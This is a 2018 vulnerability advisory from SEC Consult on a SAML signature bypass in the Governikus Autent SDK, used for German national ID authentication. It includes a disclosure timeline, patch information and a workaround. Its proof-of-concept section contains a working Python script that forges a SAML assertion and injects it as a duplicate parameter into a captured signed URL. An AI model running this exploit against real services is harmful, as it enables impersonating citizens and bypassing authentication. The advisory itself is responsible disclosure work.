An additional blog post has been published on this topic as well: English version: https://r.sec-consult.com/governikus German version: https://r.sec-consult.com/gov SEC Consult Vulnerability Lab Security Advisory < 20181121-0 > ======================================================================= title: Signature Bypass / Authentication Bypass product: Governikus Autent SDK vulnerable version: <=3.8.1 fixed version: 3.8.1.2 CVE number: - impact: critical homepage: https://www.governikus.de/ found: 2018-06 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- German original, translated to English: "In the course of digitization, electronic identities have become indispensable. At the same time, the requirements for protection, handling with regard to legal security and the federation of electronic identities are increasing. With Governikus Autent, server and client components are available to ensure authentication through electronic identities. Governikus Autent meets all the requirements of a modern identity management solution.” Source: https://www.governikus.de/produkte-loesungen/governikus-autent-und-ausweisapp2/ Business recommendation: ------------------------ During a short crash test SEC Consult identified a critical vulnerability in the Governikus Autent SDK nPA authentication code (German id card authentication). This vulnerability could allow an attacker to impersonate any German citizen on a vulnerable web application. SEC Consult recommends to immediately apply the workaround described below or apply the patch provided by the vendor. Moreover, SEC Consult recommends web application providers to check historic log files for evidence of this attack. SEC Consult recommends conducting a thorough source code security review on the Governikus Autent components as they are integral for the security of many web applications. Vulnerability overview/description: ----------------------------------- The software component tested is used by web applications to integrate nPA authentication (authentication using the German official id document). As the last step of an authentication transaction, the web application the user authenticates against receives a string containing all relevant data about the citizen (e.g. first name, last name). As this string is signed by a trusted party (an eID server), the application can verify the authenticity of this string. The component in the web application that is supposed to verify this signature can be tricked into accepting a string that has been modified. An attacker that has acquired a single legitimately signed string can use this to authenticate as any German citizen to any web application that trusts the eID server's signature. An attacker could acquire such a signed string by hosting a web application and tricking a victim to authenticate, by gaining access to a signed string sent to a legitimate web application (man-in-the-middle attack, getting access to the access log) or by authenticating against a web application using his own id document. Proof of concept: ----------------- 1. Signature Bypass During the last step of the NPA transaction, the user is redirected to the SAML receiver of the web application she tried to authenticate against. The SAML response is sent as a URL parameter: https://<host>/<receiver path>?SAMLResponse=<SAML response>&RelayState=<...>&SigAlg=<sig alg.>&Signature=<signature> According to the demo application, the first verification a SAML receiver is meant to do is call the method HttpRedirectUtils.checkQueryString passing the query string (as it is returned by request.getQueryString()). If this method returns false, the signature could not be verified. This method internally deconstructs the query string into individual parameters, reconstructs the query string and then verifies the signature. If however, the query string contains multiple parameters of the same name, only the last occurrence of a parameter is built into the query string the signature is verified against. Therefore, if a query string is constructed like following, the first SAML response is ignored during signature verification: ...?SAMLResponse=<SAML response 1>&SAMLResponse=<SAML response 2>... Afterwards, when the SAML response is processed, the application is likely to use the method ServletRequest.getParameter() to retrieve the SAML response (the demo application which is meant to show the integration of the library also does this). As per the specification of this method, the application server is supposed to return the first parameter value, if multiple parameters with the same name were sent. Thus, the signature is verified against the second occurrence of the SAMLResponse parameter, while the first occurrence of the SAMLResponse parameter is further processed by the application. An attacker is therefore able to arbitrarily modify an authentic query string. By obtaining such a string (e.g. by providing a web application with nPA login and then checking the access log), he is able to authenticate as any citizen against any vulnerable web application that also trusts the issuer of the signature. The following script demonstrates this issue: ----- snip ----- import webbrowser, re, urllib, zlib from urlparse import urlparse from base64 import b64encode # enter the URL of the receiver AUDIENCE = 'https://localhost:8443/AutentSAMLDemo/NewReceiverServlet' saml = '''<?xml version="1.0" encoding="UTF-8"?> <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:eid="http ://bsi.bund.de/eID/" Version="2.0"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" /> </samlp:Status> <saml2:Assertion Version="2.0"> <saml2:Conditions> <saml2:AUDIENCERestriction> <saml2:AUDIENCE>##AUDIENCE##</saml2:AUDIENCE> </saml2:AUDIENCERestriction> </saml2:Conditions> <saml2:Subject> <saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml2:SubjectConfirmationData NotOnOrAfter="2099-01-01T00:00:00.000Z" Recipient="##AUDIENCE##" /> </saml2:SubjectConfirmation> </saml2:Subject> <saml2:AttributeStatement> <saml2:Attribute Name="AcademicTitle"> <saml2:AttributeValue xsi:type="xs:string">The Bad</saml2:AttributeValue> </saml2:Attribute> <saml2:Attribute Name="GivenNames"> <saml2:AttributeValue xsi:type="xs:string">Evil</saml2:AttributeValue> </saml2:Attribute> <saml2:Attribute Name="FamilyNames"> <saml2:AttributeValue xsi:type="xs:string">Attacker</saml2:AttributeValue> </saml2:Attribute> <saml2:Attribute Name="DocumentValidity"> <saml2:AttributeValue xsi:type="eid:DocumentValidityResultType" Version="1"> <eid:ReferenceDate>2010-01-01</eid:ReferenceDate> <eid:Status>valid</eid:Status> </saml2:AttributeValue> </saml2:Attribute> <saml2:Attribute Name="DocumentType"> <saml2:AttributeValue xsi:type="xs:string">ID</saml2:AttributeValue> </saml2:Attribute> </saml2:AttributeStatement> </saml2:Assertion> </samlp:Response>''' saml = saml.replace('##AUDIENCE##', AUDIENCE) # make SAML as small as possible to fit it in a GET request saml = re.sub('\s+', ' ', saml) # read the captured signed URL with open('signed_url.txt', 'rt') as f: url = urlparse(f.read().strip()) c = zlib.compressobj(-1, zlib.DEFLATED, -9) compressed = c.compress(saml) + c.flush() url = url._replace(query='SAMLResponse={0}&{1}'.format( urllib.quote(b64encode(compressed)), url.query)) webbrowser.open(url.geturl()) ----- snip ----- Vulnerable / tested versions: ----------------------------- The version that was distributed with the demo application (3.8.1) was found to be vulnerable which was the latest version available at the time of discovery. Moreover, the library version distributed/included with the (at the time of discovery) latest release of the beA Client Security (3.20.3) is vulnerable as well. As our identified vulnerability affects HTTP query parsing, the beA client is most likely not vulnerable. No further analysis has been performed though. Vendor contact timeline: ------------------------ 2018-07-05: Contacting CERT-Bund for coordination support with vendor and German government agencies 2018-07-05: CERT-Bund: information will be forwarded to affected parties 2018-07-12: CERT-Bund: advisory has been forwarded to Governikus, is being investigated 2018-08-03: Requesting status update 2018-08-03: CERT-Bund: Governikus has been contacted again 2018-08-10: CERT-Bund: Governikus will be able to provide a patch until 2018-08-24 2018-08-10: Internally coordinating release date, asking for details about the patch 2018-08-10: CERT-Bund: vulnerability has been patched, customers will be informed by Governikus 2018-08-21: CERT-Bund provides additional details about the patch 2018-08-22: SEC Consult informs CERT-Bund that the advisory will be released at a later date 2018-09-28: Informing CERT-Bund about release date: 2018-11-21 2018-11-12: Sending blog post draft to CERT-Bund/Governikus 2018-11-21: Public release of the advisory. Solution: --------- Upgrade to version 3.8.1.2 of the Governikus Autent SDK. Workaround: ----------- In order to mitigate this issue, a web application could check if the request parameters provided to the receiver servlet contain multiple parameters of the same name. If this is the case, the authentication process has to be aborted. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2018
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature